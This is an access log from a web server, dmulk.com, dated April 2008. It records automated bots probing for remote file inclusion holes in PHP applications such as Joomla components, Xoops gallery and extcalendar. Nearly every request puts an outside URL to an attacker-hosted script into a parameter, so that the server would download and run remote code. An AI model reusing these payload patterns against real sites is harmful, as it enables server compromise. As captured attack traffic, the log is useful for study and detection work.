81.255.121.113 - - [17/Apr/2008:16:46:17 -0700] "GET /logs/access_080312.log/atom.php5?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.255.121.113 - - [17/Apr/2008:16:46:18 -0700] "GET /atom.php5?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.255.121.113 - - [17/Apr/2008:16:46:19 -0700] "GET /logs/atom.php5?page=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.166.217.184 - - [17/Apr/2008:16:46:37 -0700] "GET /show.php?page=http://www.systel.ru/phpbb2//language/lang_german/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
210.166.217.184 - - [17/Apr/2008:16:46:37 -0700] "GET /logs/show.php?page=http://www.systel.ru/phpbb2//language/lang_german/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:46:41 -0700] "GET /logs/access.log//popup_window.php?site_isp_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:46:42 -0700] "GET /logs/access.log//popup_window.php?site_isp_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:46:42 -0700] "GET /logs//popup_window.php?site_isp_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:46:42 -0700] "GET /logs//popup_window.php?site_isp_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.14 - - [17/Apr/2008:16:47:03 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.19.144.50 - - [17/Apr/2008:16:47:14 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.19.144.50 - - [17/Apr/2008:16:47:15 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.19.144.50 - - [17/Apr/2008:16:47:15 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.19.144.50 - - [17/Apr/2008:16:48:09 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.19.144.50 - - [17/Apr/2008:16:48:09 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.19.144.50 - - [17/Apr/2008:16:48:10 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.19.144.50 - - [17/Apr/2008:16:48:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:16:48:13 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:16:49:03 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.19.144.50 - - [17/Apr/2008:16:49:15 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.47.247.136 - - [17/Apr/2008:16:51:24 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
200.68.95.209 - - [17/Apr/2008:16:52:47 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.68.95.209 - - [17/Apr/2008:16:52:47 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.68.95.209 - - [17/Apr/2008:16:52:48 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
82.192.70.11 - - [17/Apr/2008:16:52:50 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.192.70.11 - - [17/Apr/2008:16:52:51 -0700] "GET //skin/zero_vote/error.php?dir=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.192.70.11 - - [17/Apr/2008:16:52:51 -0700] "GET //skin/zero_vote/error.php?dir=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.192.70.11 - - [17/Apr/2008:16:52:57 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
200.68.95.209 - - [17/Apr/2008:16:53:25 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.68.95.209 - - [17/Apr/2008:16:53:26 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.68.95.209 - - [17/Apr/2008:16:53:26 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
71.7.196.132 - - [17/Apr/2008:16:53:51 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:16:54:01 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:16:54:05 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:56:24 -0700] "GET /logs/access_080127.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:56:26 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:56:27 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 200 43552 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:56:50 -0700] "GET /logs/access_080127.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/dalnet.kopet/up.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:56:53 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/dalnet.kopet/up.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:56:54 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/dalnet.kopet/up.txt?? HTTP/1.1" 200 43552 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:57:26 -0700] "GET /logs/xGB.php?act=admin&do=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:57:26 -0700] "GET /logs/xGB.php?act=admin&do=http://www.geocities.com/dalnet.kopet/up.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:57:27 -0700] "GET /xGB.php?act=admin&do=http://www.geocities.com/dalnet.kopet/up.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [17/Apr/2008:16:57:27 -0700] "GET /xGB.php?act=admin&do=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:16:57:57 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:16:57:57 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:16:57:57 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:16:58:00 -0700] "GET /logs/access_080321.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:00 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:00 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:04 -0700] "GET /logs/access_080321.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:16:58:04 -0700] "GET /logs/access_080321.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:04 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:05 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:16:58:05 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:16:58:05 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:05 -0700] "GET /logs/access_080321.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:16:58:05 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:16:58:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:16:58:06 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:16:58:26 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:27 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.30.78.171 - - [17/Apr/2008:16:58:33 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lamers.za.pl/s/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.30.78.171 - - [17/Apr/2008:16:58:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lamers.za.pl/s/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:44 -0700] "GET /logs/access_080120.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:44 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:16:58:45 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.30.78.171 - - [17/Apr/2008:16:59:47 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lamers.za.pl/s/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.213.67 - - [17/Apr/2008:17:00:27 -0700] "GET /logs/access_080117.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.67 - - [17/Apr/2008:17:00:27 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.67 - - [17/Apr/2008:17:00:27 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.67 - - [17/Apr/2008:17:00:29 -0700] "GET /logs/access_080308.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.67 - - [17/Apr/2008:17:00:40 -0700] "GET /logs/access_080308.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.67 - - [17/Apr/2008:17:00:40 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.213.67 - - [17/Apr/2008:17:00:40 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.37.173.162 - - [17/Apr/2008:17:01:18 -0700] "GET /logs//?mosConfig_absolute_path=http://priottalo.altervista.org/php5/test.txt??? HTTP/1.1" 200 43557 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
200.37.173.162 - - [17/Apr/2008:17:01:20 -0700] "GET //?mosConfig_absolute_path=http://priottalo.altervista.org/php5/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:01:59 -0700] "GET /logs/access_080130.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:01:59 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:17:01:59 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:02:05 -0700] "GET /logs/access_080130.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:02:05 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:17:02:05 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:17:02:08 -0700] "GET /logs/access_080131.log/xGB.php?act=admin&do=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:17:02:09 -0700] "GET /xGB.php?act=admin&do=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:17:02:10 -0700] "GET /logs/xGB.php?act=admin&do=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.145.147.54 - - [17/Apr/2008:17:02:15 -0700] "GET /logs/access_080215.log/xGB.php?act=admin&do=http://www.geocities.com/kopet8288/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.129.86 - - [17/Apr/2008:17:02:31 -0700] "GET /logs/access_080223.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.systel.ru/phpbb2//language/lang_german/mail.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.13.166 - - [17/Apr/2008:17:02:35 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.129.86 - - [17/Apr/2008:17:02:37 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.systel.ru/phpbb2//language/lang_german/mail.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.13.166 - - [17/Apr/2008:17:02:37 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.13.166 - - [17/Apr/2008:17:02:38 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.129.86 - - [17/Apr/2008:17:02:42 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.systel.ru/phpbb2//language/lang_german/mail.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.215.166 - - [17/Apr/2008:17:02:45 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.147.108 - - [17/Apr/2008:17:02:47 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.166 - - [17/Apr/2008:17:02:49 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.215.166 - - [17/Apr/2008:17:02:50 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.147.108 - - [17/Apr/2008:17:02:51 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.147.108 - - [17/Apr/2008:17:02:52 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.13.166 - - [17/Apr/2008:17:02:58 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.13.166 - - [17/Apr/2008:17:03:02 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
195.170.179.50 - - [17/Apr/2008:17:03:02 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [17/Apr/2008:17:03:02 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.191.13.166 - - [17/Apr/2008:17:03:03 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:03:04 -0700] "GET /logs/access_080308.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [17/Apr/2008:17:03:06 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
195.170.179.50 - - [17/Apr/2008:17:03:06 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [17/Apr/2008:17:03:06 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.170.179.50 - - [17/Apr/2008:17:03:07 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:03:08 -0700] "GET /index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.247.47 - - [17/Apr/2008:17:03:08 -0700] "GET /logs/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.191.13.166 - - [17/Apr/2008:17:03:30 -0700] "GET /logs/access_080215.log/index.php?redir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
